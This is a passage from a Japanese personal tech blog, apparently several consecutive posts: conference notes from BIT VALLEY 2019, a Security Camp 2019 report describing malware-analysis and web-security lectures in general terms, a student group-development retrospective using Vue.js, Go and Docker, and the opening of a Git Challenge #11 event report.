これらを総括して, クラウド時代を生き抜くために 挑戦できる環境に飛び込んでください。
感想
BIT VALLEYの趣旨である「どのように」創造するかを体現したようなセッションでした。このセッションは, エンジニア編では4つ, プレイングマネージャ編では3つのポイントを言語化していました。言語化した情報は意識に留めやすく, 人にも伝えやすいのでありがたかったです。
世界中の開発者と共にモノづくりをするために必要な6つのこと
スピーカーは田中 洋一郎(@yoichiro)さんでした。
前座は抜きにします。タイトルにもある「世界中の開発者と共にモノづくりをするために必要な6つのこと」は以下の通りです。
- 素振りを欠かさないこと
- 居場所を探し続けること
- 外部とのつながりを持つこと
- 何かを作って公開すること
- カッとなったときにやること
- 英語に屈しないこと
1つずつ深掘りします。
1. 素振りを欠かさないこと
基本をこなしながら, 試行錯誤を繰り返して引き出しの数を増やしてください。
素振りとは「基本をこなす」という意味合いです。人は何も土台のないところから閃くことはありません。そのため, 基本→応用→閃きの順に構成していくことが必要です。言い換えれば, 土台→工夫→未知となります。その過程で, 素振りを欠かさないでおけば, 自分の引き出しが増えていきます。それにより, 突然降ってきたタスクに対応しやすくなります。
引き出しの数を増やすためには, 様々なことに少しずつチャレンジしてください。オススメはチュートリアルをやることです。チュートリアルが余裕ならベータ版に触ってみるのも良いです。
2. 居場所を探し続けること
どこにいれば自分の信じる次のステージに行けるかを考えてください。
#bitvalley2019
— Tasker (@task4233) September 14, 2019
どこにいれば自分の望む次のステージに行けるかを考える。
それに応じて属する場所を変えていく。
ハードウェアやサービスは日々刻々と変化しています。それに応じて属する場所を変えていくと良いでしょう。
3. 外部とのつながりを持つこと
広い視野を持つために, 身近なことから始めてください。 始めるのは簡単なことからで良いです。
最初は, 手軽に始められる勉強会に参加しましょう。そこで手を動かしてアウトプットします。時には身内に対して情報を共有するのも良いでしょう。それを繰り返して, 徐々に影響範囲を広めていきます。その過程で, よりアクティブで, より詳しく, より尊敬できる多くの人々と出会います。そして, 迷ったら即相談できるような仲間ができていきます。
気がつくと, 自分の周りに日本人がいなくなります。なぜなら, 自分より詳しい日本人がいなくなるためです。その時, あなたは「多様性」の中に自分がいるでしょう。
4. 何かを作って公開すること
何かを自分で作ってください。 そして, 作ったものを公開しましょう。公開すれば, その制作物が独り歩きして, 人や情報を集めてくれます。
5. カッとなったときにやること
カッとなったとき*4に, 積極的に行動してください
積極的に取り組むと事故の発生率は上がります。ただし, 優秀な人ほど事故も経験しています。すなわち, 優秀さとはどれだけ失敗しそれをリカバリーしたかということです。日頃から積極的に行動し, 事故を経験すればするほど, そのあとの伸び率は高いでしょう。
6. 英語に屈しないこと
得意なことに英語を取り入れてください。
具体的には, 様々なチュートリアルを英語で学んだり, GitHubのリポジトリを英語のみで書いてみたり, 作ってみたモノを英語で宣伝してみたり, stackoverflowで回答してみたりと, 様々です。
世界には第二外国語が英語の人が多いので, 拙い英語なのはお互い様です。お互い興味のあることなら何度でも聞き直して問題ありません。
この繰り返しで成功体験を積み上げることで, あなたの自信につながります。
感想
このセッションは私の考えと似た部分があったので, 共感できる部分が多かったです。それに加えて, 私が出来ていないことが言語化されていて, モヤモヤしていた部分が少し晴れました。残りのモヤモヤは, 実践して自信をつけて解消していくつもりです。
全体を通して
個々のセッションの方向性は違えど, よく耳にした内容が3つあります。
1つ目は, 「アウトプットすること」 です。これが最も多かったように感じました。アウトプットは成果を公開するだけでなく, 情報が集まるきっかけになったり, 情報を整理するきっかけになったりします。そのため, 小さなことでもアウトプットしていくことは重要だと感じました。
2つ目は, 「気になったらやってみること」 です。「カッとなったときにやる」や「違和感をきっかけにモノを作る」といったように表現は違えど, 根は同じであると考えています。私は興味のあることにひたすら取り組んでいるので, この姿勢を続けていこうと考えています。
3つ目は, 「成功体験を作ること」 です。成功体験はあなたに自信をもたらします。そのため, 「どのように創造するか」において重要な要因の1つなのではないでしょうか?私は小さな成功体験はあるものの, 1番秀でていると誇れるほどの成功体験は未だにないので, 徐々に積み上げていくつもりです。
おわりに
以上が参加記録になります。
全体的に刺さったセッションが多く, 気づけたことの多いカンファレンスでした。 そのため是非来年も参加したいと思います。
学生は無料だったので, 興味のある方は来年のBit Valleyに参加してはいかがでしょうか?
セキュリティ・キャンプ全国大会2019参加記
はじめに
先日セキュリティ・キャンプ全国大会2019に参加してきたので, その参加記録を書きました。
この記事の目的は, 今後セキュリティ・キャンプに参加する方々に対して, セキュリティ・キャンプの概要や得られるモノなど, 私の印象に残ったことを共有するために書きます。全体の流れは以下のもくじを参照してください。主観的な意見も複数含まれるため, 参考程度に読んでいただければ幸いです。
また, 今回のキャンプで行われたことは, 詳細に記述すると色々と問題が生じる内容を含んでいます。そのため, 内容があいまいになっている部分が多々あるので, その点を理解した上で読んでいただくよう, よろしくお願いします。
もくじ
応募したきっかけとAトラックを選択した理由
応募したきっかけ
昨年, 私が大学内のPC実習室でアルバイトをしていた際にポスターを見つけたのがきっかけでした。しかし, 気づいた頃には応募締め切りを過ぎていたため, 今年こそは申し込もうと考えていました。
A 脆弱性・マルウェア解析トラックを選択した理由
脆弱性・マルウェア解析トラックに応募した理由は, 選べるトラックの中で個人の力で学ぶことが最も難しそうな内容だと感じたためです。マルウェアはその危険性から専門的な知識を持った人間のみが解析をしています。そのため, このトラックの集中講義を受けることで非常にレアな経験ができると考えました。
キャンプ全体の大まかな流れ
キャンプは5日間で構成されており, そのうち専門講義を受講できるのは2・3・4日目の3日間です。残りの期間は, 全体講義やグループワークで構成されていました。 したがって, トラックごとの特色が現れてくるのは3日間ということになります。参考までに私の専門講義のある2・3・4日目のスケジュールは以下の通りでした。
- 6:00~ 起床
- 6:45~ 朝食
- 7:15~ 前日の内容と事前学習の復習
- 8:30~ 専門講義
- 12:00~ 昼食
- 13:30~ 専門講義
- 17:30~ 夕食
- 19:00~ イベントや専門講義
- 21:00~ HR
- 22:00~ 本日の復習と翌日分の事前学習の復習
- 23:00~ 就寝
6時起床なんて無理だろうと思っていましたが, 割と起きられました。とはいえ, 7時起床している方や8時起床をしている方もいたので, 6時起床しなければならないという訳ではありませんでした。
会場でのフリートークについて
今回のセキュリティキャンプでは, 可能な限り積極的に人と話すように心がけていました。結果的に, 5日を通して60人ほどの方々とお話できました。そこで重要になってきたのが名刺の存在です。参加する方は必ず名刺を刷っていきましょう。とはいえ, 名刺に載せる情報に困ると思うので, 私が名刺に書いておいた方が良いと感じた項目をいくつか書いておきます。
- 氏名(漢字の場合はふりがなを振っておくと良い)
- ハンドルネーム(あれば)
- 所属(学校名/学科/専攻)
- メールアドレス
- SNSアカウント(Twitter/Facebook等)
- WebページのURL(Portofolio/GitHub/Blog等)
- 趣味・普段やっていること
そして, 今後参加する方は, 講師・チューター陣に対してはパケット欠損率0%が保証されているので, 積極的に質問パケットを飛ばすことをオススメします*1。話すことがなくなったら「興味のあることはなんですか?」や「何の人ですか?」という質問をすると, DDOS攻撃さながらの応答パケットが帰ってくるのでオススメです。
また, 食事の時は講師やスポンサーの方々が固まって食事をしていることが多いので, 図々しく突撃して話をすることもオススメします。突撃してお話をすると以下のようなメリットがあります。
- 名刺交換の機運が高まります
- フォロワーが増えます
- 思いもよらぬ情報が得られます
- 相手のツテで他の方を紹介してくれることもあります
専門講義の概要等
私が参加した専門講義の内容を書きます。全体講義に関しては, 私より文章力のある他の方のブログ等を参考にしてください。その代わり, 専門講義は可能な限り具体的に書くつもりです。
A1-3 インシデントレスポンスで攻撃者を追いかけろ
概要
事前学習で学ぶ知識のうちの約8割の内容を学習するので, 事前学習は本当に重要です(事前学習ができていないと本番で何もすることが無くなります)。
そして, 本番ではproxyサーバのログやPCごとのイメージファイルが配布されます。それらを解析することで, マルウェアはどこにあるのか, 何をpersistenceとして動いているのか, いつ感染したと考えられるのか等を調査し, どのような流れで攻撃者が攻撃を行ったのかをCTF形式で解明していきました。私のCTFの結果では3位でした。
また, CTF形式の調査終了後, グループを作って今回のインシデントの問題点とその解決策を発表しました。
事前課題
事前学習の時期とテスト期間およびサンフランシスコでの講義が重なり, 時間のやりくりが大変でした。そのため, セキュリティ・キャンプ前の数日間にフリーな時間を作ることをオススメします。
これは来年以降にセキュリティキャンプに行く人に対してよくない例として呟いておくのですが, セキュリティキャンプの前に用事を多く入れるべきではなかったです。キャンプのことに気が回らず, 事前学習や連絡等を見逃すことが多くて虚無しかない。
— Tasker (@task4233) 2019年8月10日
とりあえず今から出来ることをやるけども。
講師の梨和さんは, 事前課題に対して「知識や技術のばらつきがあると思いますので一概には言えませんが, 問題自体は1〜2時間程度あれば回答できるような内容です」と仰っていましたが, 私は1つの課題につき最低でも5〜6時間はかかりました。その原因は, 問われていない部分を調査して言語化して回答していたためだと考えています。具体的には, 以下のPDFのようなログを検索する際のコマンドの使い方が挙げられます(これは単純にパースするだけのコマンドなので公開しても問題ないはずですが, 削除要請があれば消します)。
これをやっておいたおかげで, 本番でproxyサーバのログを解析する際に, コマンドを思い通りに使用することができました。私は計画と時間の使い方が下手だったので, 全ての課題についてまとめることは出来ませんでしたが, 来年度以降に参加する方は理解を深めるためにぜひ知識のまとめをすると良いかもしれません。
講義を終えて
講義が終わって抱いていたことは「もっと解析したかった」ということです。私は最初から足踏みをしてしまい, 結果的に事前課題の半分も活用できませんでした。とはいえ, 足踏みしていた際に講師の梨和さんや小林さんが質問に応じてくださったため, なんとか足踏みを解消して問題解決に取り組むことができました。質問に対して真摯に対応してくださった講師のお二方には感謝しかありません。
また, 最後に扱ったインシデントのタイムラインを公開してくださったおかげで, 扱ったインシデントの全体像を捉えることができました。それに応じて, 私がCTF中に解明できた部分と合致している部分と勘違いしている部分が明確になったため, 非常に参考になりました。
A4 Reverse Engineering Malware - Know Your Enemies
概要
本講義では前半で座学があり, 後半ではにIDAを用いて実際のアセンブリコードを解析することで, コードがどのような挙動をするのかを調査する形式がとられました。
座学では次で触れる事前課題のレビューや直近3年間の攻撃手法, 静的解析のための知識等を扱いました。そして, アセンブリコードの解析では, 与えられたi64ファイルを解析して, Moduleごとの役割を調査しました。
事前課題
事前課題として, idbファイル*2のModuleにコメントをつけたり変数名を変更したりして各Moduleの機能を明確にする課題が課されました。この課題に際して, 以下の3つのポイントを段階的に解明していくと良さそうでした。
- WinAPIを調査する
- WinAPIに与えられるArgumentsを調査する
- 状態に応じた分岐を調査する
これを極めることで, 中津留さんのような高速な静的解析ができるのではないでしょうか(ホンマか?)
講義を終えて
私は応募課題のアセンブリを読む問題が解けなかったため, アセンブリを解析することに不安がありました。しかし, 本講義を受けたことでアセンブリをすべて読む必要はなく, 必要な部分のみを読むことで解析ができることを学べました。中津留さんのように高速かつ的確に読むことはできませんが, 講義を通して明らかにアセンブリを効率よく読めるようになったので, 受講して良かったと考えています。
B5 体系的に学ぶモダンWebセキュリティ
概要
本講義では座学と実習を組み合わせながら学ぶ形式が取られました。以下が講義で使用されたスライドです。
丸投げになりますが, スライドを見れば内容はわかると思います(素晴らしい出来なので, 私が書かなくても情報は伝わってくると思います)。
事前課題
事前課題は3つありました。
1つ目の課題は講師のつばめさんが執筆中のPDFの確認でした。基礎的なOriginの説明から入り, サイドチャネル攻撃についても具体的に触れられていました。
2つ目の課題は, SOP/CORSの挙動確認でした。具体的には, つばめさんが公開しているWebページで実際にそれが挙動していることを確認するというものでした。
3つ目の課題は, XSS-ChallengeでのWeb問の確認でした。XSS-Challengeとは, つばめさんが岡山のミニキャンプで利用したXSS用のWebページで, それを各自解くというものでした。
これらの事前課題は実際に手を動かす必要があり, 事前課題から体系的に学ぶことができる内容となっていました。XSS-Challengeを全て解くことは大変でしたが, 解答も同時に教えてくださったためサクサクと進められました。
講義を終えて
本講義では, CTF風の形態で演習が行われたので, 実践的に学ぶことができました。その上で, 受講生の進度に合わせて講義を進めてくださったため, 進度もちょうど良かったです。具体的には, CSS-injectionのexploitを書くのに時間がかかったため, 後半のXS-LeaksやXS-Searchの話題を省き, Recon Challengeに入ったことが挙げられます。
また, 講義が終了してからも1週間ほどサーバーを稼働し続けてくださったため, キャンプ終了後も手を動かして復習することができました(ありがとうございました)。
A6 マルウェアの暗号処理を解析しよう
概要
本講義では座学と実習を組み合わせながら学ぶ形式が取られました。
まず, 座学にてRC4(ARC4), ChaCha, Blowfishの3つの暗号化を学びました(講義資料にはAESも含まれていました)。次に, C言語で各暗号化を実装したファイルとそれをコンパイルしたアセンブリを確認し, Cで記述された処理がアセンブリではどのように記述されているのかを確認できました。最後に, 各暗号化の特徴を確認し, それを検知するPythonスクリプトを書きました。
事前課題
ありませんでした。
講義を終えて
RC4(ARC4)という名前を知っていたものの, その中身の実装は理解していなかったので, 講義の序盤から知見が得られました。
そして, ChaCha, blowfishのアルゴリズムを確認していく中で, RC4(ARC4)はループとxor, ChaChaおよびblowfishは平文がパラメータとして与えられることなどを理解でき, 難解だと考えていた暗号化技術に対する印象がガラリと変わりました。
この講義で良かった部分は, C言語のコードとアセンブリコードの両方があり, これらを比較することで処理の対応づけが出来たことです。IDAで見ると, 各暗号化の特徴がしっかりと確認できたので, 納得のいく講義でした。
E7 実践トラフィック解析
講義の概要
最初に座学が行われ, 次に実際にトラフィックをキャプチャして解析し, 最後にトラフィックに対するレポートをまとめて発表するという形式が取られました。
キャプチャするトラフィックはセキュリティキャンプ会場の生のトラフィックであったため, 他講義のトラフィックを確認したりShinoBOTを確認したりする班がありました。
事前課題
事前課題は3つありました。
1つ目の課題はWiresharkInstallBattleでした*3。
2つ目の課題は自端末のNICをキャプチャして得られたパケットの内容確認でした。私は, キャプチャしてからネットサーフィンをしていたので, HTTP関連のパケットが非常に多かったです。
3つ目の課題は, 配布されたpcapファイルの解析でした。私は10個あるファイルのうち3,4個しか解析しませんでした。
講義を終えて
生のトラフィックを解析した経験が無かったので, 生のトラフィックを見ることができたことが印象に残っています。それに加えて, 人間はネットサーフィンをしがちなので, HTTPパケットが多くなるだろうと私は想定していましたが, 実際はTCPパケットが多かったのも印象的でした。
また, キャンプ内のネットワークでCTF問題のパケットらしきものがありました。そのページにはネクストキャンプ講師の伊東さんの画像が貼られていたので, ネクストキャンプでCTF問題でも解いていたのでしょうか......?
キャンプ終了後に行っている活動について
既に行っている活動は3つです。
健康的な生活習慣の継続
割とこれは冗談じみていますが, 重要なことだと考えています。
セキュリティ・キャンプでは, 6~7時起床, 23~24時就寝という健康的な生活習慣をしており, その後もこの習慣を続けています。私は, つい2~3時ごろまでPCを触って夜更かしをして最終的に昼夜逆転することも珍しくないので, この習慣を続けていこうと思います。
最近, 遅くとも23時には寝て6時ごろに起きるようになっているので良い傾向。セキュリティキャンプさまさまだ。
— SubTasker (@subtask4233) 2019年8月20日
CTF学習グループの形成
初級者から中級者に上がるためのCTFグループでの学習およびCTFの参加です。私はCTFの初心者にあたるので, そこから中級者になるために, 同様の状態にある方々とグループを作り, CTFに関する話題の共有等を行っています。
実際に昨日開催されていたHackCon'19では705Pointsで113位でした。私は0ACでしたが, 情報共有で役に立てたのではないかと考えています。
マルウェア解析の情報共有
今回, 私は脆弱性・マルウェア解析トラックに応募して, マルウェアを解析したいという同士がいました。その同士と共にマルウェアの解析について情報共有を行っています。具体的に何かを始めた訳ではありませんが, グループで1つのマルウェア解析コンペのようなものが出来たら楽しそうだなと考えています。
さいごに
ここまでお読みいただきありがとうございました。
セキュリティ・キャンプ全国大会で印象に残った部分を可能な限り述べ, その素晴らしさを押し出したつもりです。私は大学で教職課程を履修しているため, 大学のある時期にはイベントに参加しづらいですが, セキュリティ・キャンプのように夏季休暇中に行われるイベントには参加することが出来ます。故に, このようなイベントは非常にありがたく, 内容としても非常に濃いものを受容することが出来ました。今回受け取ったモノを還元したいという意味でも, さらに新しいモノを吸収したいという意味でも, 来年度もチューターとして参加したいと考えています。
そのために, 今回の事前課題等を改めて復習したり趣味でマルウェアの解析を行なったりして, チューターとして申し分ないような知識と技術を身につけようと考えています。
キャンプ前に運営にご迷惑をおかけしたり, キャンプ中には夜遅くまでお話していただいたり, キャンプ後には講義の内容を教えていただいたりと最初から最後まで色々とご迷惑をおかけしましたが, 全てしっかりと対応していただき悔いのないキャンプにすることができ, 本当に感謝しています。セキュリティキャンプに従事された講師, チューター, スポンサーの方々および私と話をして情報共有してくださった受講生の皆さま, 本当にありがとうございました!
以上がセキュリティ・キャンプの参加記となります。セキュリティ系の専門分野について集中的に学べるだけでなく, スタッフや他の参加者と話して知識を広げるチャンスなので, ぜひ今後のセキュリティ・キャンプやミニキャンプに参加してみてはいかがでしょうか?
約2ヶ月半のグループ開発をして学んだこと
はじめに
この記事は, 講義として約2ヶ月半のグループ開発を経て, その過程で学んだことを記録する目的で書きました。グループ開発の内容よりも良かった部分および悪かった部分とその改善策を書いた方が自分のためにも見る方のためにもなると考え, 開発の中身はあまり深く書きませんでした*1。ご承知おきください。
もくじ
開発していた環境
開発日数は全体で2ヶ月半で, 環境構築に2週間ほど, 残りの1ヶ月程度でコーディング及びテストを行いました。メンバーは6人で以下の通りでした。
| 人 | 立ち位置 | 補足 |
|---|---|---|
| もっちー | リーダー兼デザイナー | 事務作業およびデザイン系のプロ。「コードが書けないので」と言いつつ実績コード数はある。 |
| 松君 | フロント側の開発リーダー | 休息を犠牲にして指数関数的に強くなったプロ。彼のおかげでVueXを導入できた。 |
| K君 | フロントエンドエンジニア | 初心者なりにも理解しようと努力していたひと。分からない部分はしっかり質問してた。 |
| O君 | バック側の開発リーダー | インフラ面やコードレビューの絶対的プロ。何故かアイコンがいちごオレ。 |
| 鴨君 | バックエンドエンジニア | Javaのプロ(らしい)。Golang初めてとか言いつつしっかり実装してた。 |
| 私 | バックエンドエンジニア | Vue.jsとGolangを少し書ける。最終的にフルスタックになってた気がする。 |
開発したもの
概要
開発したアプリケーションは, モノを管理するアプリケーションで「mono-management」と言います。提供する機能は, モノの登録と編集, 親子関係を持つタグによるモノのカテゴリ分けなどです。
アプリケーションの構成は以下の通りで, フロントエンドをVue.js, バックエンドをGolangおよびMySQLサーバで実装しており, アクセスはNginxを介して行う設計としました。なお, これらのサーバは全てDockerコンテナ上で動作させました。
サーバの環境構築
サーバの環境構築には, docker-composeを選定しました。選定した理由は, 複数のサーバを立てて相互で通信するため, 1発でまとめて環境構築できるのが魅力的だったためです。とはいえ, バックエンドで使用したDockerのMySQL8.0公式スクリプトにバグが潜んでいたため, それの特定と対応に時間がかかりました*2。これにより, 環境構築のためのdocker-compose.ymlやsqlfiles, nginx.conf等の作成が約2週間程かかってしまいました。しかし, ここでしっかりと環境構築したおかげで, 開発時の結合テストが本当に楽になったので悪くなかったと考えています。
フロントエンド
フロントエンドのページ作成には, JavaScriptのVue.jsフレームワークを選定しました。選定理由は2つありました。1つ目の理由は, 納期があるため学習コストの低いフレームワークを選定する必要があったためです。フロントエンドのフレームワークを触れたことがないメンバーが複数いる状態だったため, 私たちに選択の余地は無かったように思います。2つ目の理由は, サーバとの通信を最低限にするSPAを導入したかったためです。今回開発したWebアプリケーションはモノの登録や編集などでページ遷移をすることが多くなることが想定されました。そのため, 必要な部分のみをバックエンドのAPIサーバとやりとりすることで通信時間の短縮が期待できました。結果として, Vue.jsを利用したことで開発初期はあまり進んでいませんでしたが, 途中からコンポーネントの再利用やVueXの導入によって開発が加速し, 結果として何とか納品することができたので正しい選択だったと考えています。
バックエンド
DBサーバ
バックエンドのDBサーバには, MySQLを選定しました。選定理由は, フリーで使用できるDBの中で最もポピュラーなDBだったためです。今回はdocker-composeでサーバを管理していたため, 初期起動時にテーブルを自動生成するためのsqlファイルを書きました。sqlfilesを置いておくだけで, コンテナ内にテーブルを生成してくれるのでかなり楽でした。
JSON APIサーバ
バックエンドのJSON APIサーバには, Golangのginフレームワークを選定しました。選定理由は, Golangのフレームワークの中で最もGitHubのドキュメント等がしっかりしていると感じたためです。 以前の記事であるmixiさんのGit Challengeでしゅもんさんという方に相談した際には「APIサーバ程度なら軽量でswaggerでAPIが吐くJSONも簡単に確認できる出来るgoaがオススメ」と言われました。しかし, メンバーのO君と話し合った結果, swaggerを利用した開発は魅力的ですが, 今回の開発規模なら手書きで対応できるため学習コストを低くするという意味でもginの方が良いという結論に至りました。結果として, ドキュメントを見るかググることで対応できたので, ginで問題ありませんでした。しかし, 他の言語・フレームワークと比較した時にGolangのginフレームワークである必要があったかと聞かれると, はっきりと答えることができません。強いて言えば, 「私がGolangの言語仕様が好きなので」ということくらいでしょうか?
また, Golang以外の言語でもあるとは思いますが, documentを自動生成してくれる機能も魅力的でした。実際にGitHub Pagesで公開しているので, もし良ければ参照してみてください。
ORMライブラリ
APIサーバがDBサーバとやりとりするために, GolangのORMライブラリとしてgormを選定しました。このライブラリの選定理由は, 使用するginフレームワークとの相性が良さそうで, 何よりGolangのORMライブラリの中で最も多機能だったためです。基本的な文法に加え, トランザクション管理などもしっかりと対応していたため, 開発時に欲しい機能は大抵あり非常に助かりました*3。
開発に伴い作成した書類
開発を始める前に, 要求仕様書・外部設計書・内部設計書・総合テスト仕様書という書類を作成しました。各仕様書の内容については, ググれば幾らでも出てくるので割愛します。
良かった部分
設計書を書いてからコーディングを始めたこと
(講義の構成上ですが)設計書を作成してからコーディングを行なったため, 全体像を見据えながら次に何を書くべきなのかを明確にしてコーディングを行うことができました。更に, フロントとバックを結合する際に想定されるリクエストとレスポンスが定義されていたので, 割と問題なく結合できたのも良かったです。*4
Pull Requestに対するレビューの義務化
私たちはGithub-Flowに沿った開発を行っていました。そこで, developが汚染されるようなコードをマージされるのを危惧して, developへのマージに関して1人以上のレビュアーによるApproveを義務化しました。*5これにより, 他人に読まれることを意識して, 関係ない差分を入れないようになりました。また, 私だけかもしれませんが, 自分のコードを読んでもらえると嬉しいので, モチベにつながったという副作用もありました。
docker-composeによる一括管理
これはサーバの環境構築でも書きましたが, フロントエンドとバックエンドの結合テストが, $ docker-compose up と1度叩くだけでできてしまうので非常に楽でした。そして, コンテナはVMと比較して軽いので複数コンテナを立ててもメモリが圧迫されなかったのもポイントです。また, Dockerは環境依存しないので, 本番環境のUbuntuでもO君のArchLinuxでも私や鴨君のMacOSXでもテストをすることができ, Pull Requestに対するレビューに対応できたのも良かった点です*6。
slackによる情報共有
現在はslackを使用している人が多いと思うので主要機能は割愛します。私たちのslackで特徴的だったのは, #懺悔室チャンネルの存在です。#懺悔室チャンネルはミスした時に懺悔(報告)をするチャンネルです。ここに吐き出すことで, ミスをしても後腐れなく開発ができたので良かったと考えています。*7
悪かった部分とその改善策
関係ない差分を含んだPull Requestを飛ばしてしまったこと
悪かった点
例えば, 以下のようなPull Requestが挙げられます。
色々とツッコミどころがあると思いますが, 何より「Fix get tag list」というPull Requestにも関わらず, modifiedに関係ないファイルが多すぎることが一番の問題だと思います*8。実はこのPull Requestでは関係ない差分で必要な行を削除してしまっていたのです。この時はレビュアーがミスに気づき指摘してくれたので助かりましたが, このように関係ない差分を含んだPull Requestを飛ばしてしまったのは悪かった点だと考えています。
改善策
シンプルで効果的な改善策は, Pull Request名を厳格に書くということです。厳格に書くことで, 関係ない差分を含んでいる場合は気づけますし, Pull Request名に「&」が入る場合はPull Requestを分割して行えば良いので, 差分の簡略化かつ明確化に繋がると考えています。しかし, 今回の開発でもそうでしたが, 厳格な命名をつけるのは面倒なものです。そのため, 普段から厳格な命名をつける心がけをして, 厳格な命名を習慣化することが重要だと考えます。
環境構築が遅かったこと
悪かった点
サーバの環境構築でも書きましたが, docker-compose関連の環境構築で約2週間を費やしてしまいました。先日以下のようなツイートを見かけて, 他講義により開発時間を確保できなかったり公式MySQLスクリプトの不備などの問題があったりしたものの, やはり2週間は長すぎたなと思いました。
えっ!?
— と (@t0riumi) 2019年7月29日
開発環境の構築に二日以上かかるエンジニアがいるんですか!?
しっかりとした環境構築のおかげで, 後々の開発が加速したのでその点は良かったのかもしれませんが, この期間が短ければ開発日数を増やせたのかなとも思います。
改善策
これに対する改善策をずっと考えていたのですが, 思いつきませんでした。強いていうなら経験を積んで, 起きそうな問題を把握しておくことくらいでしょうか?環境構築が大変なことはよく理解しているつもりなので, これに対して効果的な改善策はないと考えています(あれば教えて欲しいです)。
レビューの仕方が曖昧だったこと
悪かった点
先述した通り, 今回はPull Requestをマージする際にレビューを義務化しました。しかし, レビューをする機会がほとんど無かったため, レビューの仕方が人によって異なっていたのも問題だった気がします。私は, コードの変更差分の確認と, 動かした際にPull Requestの内容で正しく修正されていることが確認できたらApproveしていましたが, このレビュー方法も正しかったのかどうかわかりません......
改善策
レビューに関して詳しいことはわからないので, 本なり記事なりを見て学ぶのが一番だと思います。ただし, Pull Requestする側は, レビュアーがレビューしやすいように変更差分を簡潔にしたり, commitを多く挟んだり, Pull Requestの目的などを明確にしておくべきだと感じました。結局のところ, Pull Requestが曖昧だとレビュアーも困りますしね。
今回の開発で学んだこと
今回の開発で学んだことを技術面/非技術面に分けて要点のみを絞って書いておきます。
技術的な話
docker-composeによる環境構築は時間をかけてもやっておくべき
今まで散々書いてきましたが, 結合テストが楽というメリットが最も強いです。今回のようにフロントエンドとバックエンドが異なる場合は, 結合テストを行う際にそれぞれのサーバの環境を合わせて別々に立てるのは大変です。また, 仮に立ててもCORS関連で通信ができないトラブルが起きようものなら辛い気持ちになることでしょう。そのため, $ docker-compose up で本番環境が立つdocker-composeは有用でした。
公式のスクリプトにも誤りはあるのでコードを読んでみるのもアリ
今回悩まされた公式MySQL8.0のスクリプトの件です。今までは, 5,6時間バグと格闘して対処法が見つからない場合, 時間がかかりそうなので別の手法に変えるようにしていました。しかし, 今回のようにGitHubでコードが見れる場合は実際のコードを確認して「なぜそのエラーが出ているのか」を確認することで, 自らパッチスクリプトを書いて対処可能なことを学びました。時間はかかるかもしれませんが, どうしてもその技術を使用する必要のある時に有用なので, 頭に留めておくつもりです。
不明瞭で必要のない差分を含むPull Requestは悲劇を生むことがある
今回の記事では触れませんでしたが, 実は問題のあるPull Requestがマージされてdevelopブランチが汚染されたことがありました。$ docker-compose upが正しく動作しなかったので気づけましたが, これが気づきにくい部分だったらと思うと恐ろしいです。この件に関しては, レビューの時点で気づけなかったのも問題ですが, 何よりそのようなPull Requestを飛ばさないのが一番だと思います。
非技術的な話
時間は有限
今回開発を行った際に強く感じたのは, 時間が足りないということでした。コーディングを始めてから締め切りまでは1ヶ月強ほどあったはずですが, 他講義との兼ね合いで実際にコーディングできたのは50時間も無かったように思います。これは開発以外にも言えることかもしれませんが, 締め切りが先でも使える時間は有限なので, 必要最低限のコードを実装できるような規模にすることが重要だと感じました。
「グループワークに不満があるなら全部お前がやればいい」は大嘘
これはとある講義のグループワークをしていた時に, とある教師から言われたのですが, 長期間の作業に関してこの考えは通用しないなと感じました。結局, ひと1人ができることなど高が知れていますし, 何よりこのやり方は自分の首を締めるだけでなくメンバからの不信感を増大させるので, 長期間の作業には向いていないと感じました。大抵の場合, 「これやって」とお願いすれば何らかの反応があるので, まずそれをするのが良いと思います。
おわりに
ここまでお読みいただきありがとうございました。読み返してみて「まぁそれはそうだよな」と思えるレベルのことが多い気がしましたが, 少しでも参考になれば幸いです。良かった部分は「当然だろ?」と思えるように, 悪かった部分は繰り返さないようにしようと思います。
また, 今回の開発は長かったようで短く, 前期日程の空き時間をほとんど全て注ぎ, 他のことが出来ないほどでした*9。正直こんな厳しい開発はしたくないなと思うので, 次に開発をするときはマトモなボリュームの設計にして開発しようと思います。
*1:現時点でその部分を知って得する人が思いあたらないので書くつもりはないです
*2:既にIssueが立っていました。O君がこのバグに対応するパッチスクリプトを書いてくれました。
*3:開発時に「有能じゃん」と頻繁に言っていたのをよく覚えています。
*4:一応JSONの変数で大文字小文字関係のトラブルはあったものの, それ以外に大きな問題は起きませんでした。
*5:企業でのグループ開発をしたことがないのでわかりませんが, やはりこれが一般的なのでしょうか?
*6:Windows10 Home EditionだとHyper-Vが使用できなかったので, フロントの2人は使えませんでした。早くWSL2出てくれ......
*7:これは余談ですが懺悔したメンバーがすぐに退出するので, 常駐していた1人のメンバーがシスターと呼ばれるようになっていました。
*8:「CreateMonoとEditMonoは副作用なのであまり見なくておkです。」も問題ですが。
Git Challenge #11 参加記
はじめに
この記事は, 2019年5月18日に開催された株式会社mixi主催のGit Challenge#11の参加記になります。
ブログを書くまでがGit Challengeらしいです。
Git Challengeとは
2人1組となってGitリポジトリに設けられた難題を解決していく競技型技術イベントです。 このイベントは今回が第11回目で, ジャッジシステムの構成を一新したそうです。
詳しくは, 次のリンクを参照してください。
きっかけ
mixiさんのツイートでした。実は直前までデータベーススペシャリスト試験の対策等で忙しかったので, 締め切り30分前にオタクのような文を2000字程度書いてmixiさんにお祈りをしながら提出しました。その結果, 締め切り直前の提出にも関わらず当選しました。*1
ですから, 締め切りのギリギリでも諦めずに提出していきましょう!
イベント当日までに行ったこと
まず, Slackで要求されたPerl5系のアップデートを行いました。そして, Perlはコードゴルフで使われている印象が強かったので, AtCoderでコードゴルフをしているこたつがめさんの記事に目を通していました。結果的にほとんど理解できなかったので意味があったかは分かりかねますが......*2
次に, 基本的なGitのコマンドをローカル環境で動かしてみて確認しました。 参考にしたサイトをぶら下げておくので, もし良ければ確認してみてください。
イベント当日に行ったこと
会場に到着するまで
起床Challegeは当然成功しました。*3
渋谷駅に到着したのが10時ごろと早すぎたため, 近くのドトールで過去の参加記を確認しながら時間を潰していました。
会場に到着してから
会場には, AlphaからLimeまでの12グループがありました。その中で, 私はCharlieグループに分類されました。
イベントは次の流れで行われるようでした。
- スタッフによる技術解説 part1
- チュートリアル
- 昼食
- 競技本番
- 解説
- スタッフによる技術解説 part2
- 夕食と懇談会
スタッフによる技術解説 part1
Git Challengeにおける新システム構成
今回の11回目で新システムを導入したそうです。 詳しくは, ジャッジシステムのリポジトリを参照すると良いと思います。
Gitでドメイン管理
Gitでドメイン管理をする話についてご説明いただきました。
